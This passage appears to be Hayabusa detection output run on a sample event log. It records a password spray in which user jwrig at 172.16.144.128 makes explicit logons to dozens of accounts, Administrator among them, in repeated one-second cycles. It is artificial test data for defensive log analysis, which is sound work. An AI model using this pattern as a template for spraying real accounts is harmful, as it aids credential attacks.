DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : 